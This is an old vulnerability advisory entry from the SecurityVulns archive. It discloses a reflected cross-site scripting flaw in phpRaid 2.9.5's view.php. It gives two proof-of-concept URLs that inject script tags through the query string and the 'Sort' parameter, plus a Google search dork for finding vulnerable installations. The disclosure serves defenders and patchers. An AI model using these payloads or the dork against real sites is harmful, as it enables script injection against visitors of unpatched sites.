phpRaid "view.php" XSS Vulnerability

2006-05-23T00:00:00
ID SECURITYVULNS:DOC:12768
Type securityvulns
Reporter Securityvulns
Modified 2006-05-23T00:00:00

Description

phpRaid "view.php" XSS Vulnerability

Script : phpRaid Script Website : http://www.spiffyjr.com/ Version : phpRaid v2.9.5

This Xss Works On phpRaid

Exploit ;

1-) Http://www.example.com/phpRaid/view.php?<script>alert('Xss%20Vulnerability');</script>

2-) Http://www.example.com/phpRaid/view.php?mode=view&raid_id=6&Sort=><script>var%20Xss_Vulnerability=31033031;alert(Xss_Vulnerability);</script>

Google Dorks : inurl:"phpRaid"

TeufeL // Netkabus.Com Research And Develop Group


Real-time chat with your friends - Free download - MSN Messenger
http://messenger.msn.com/?mkt=tr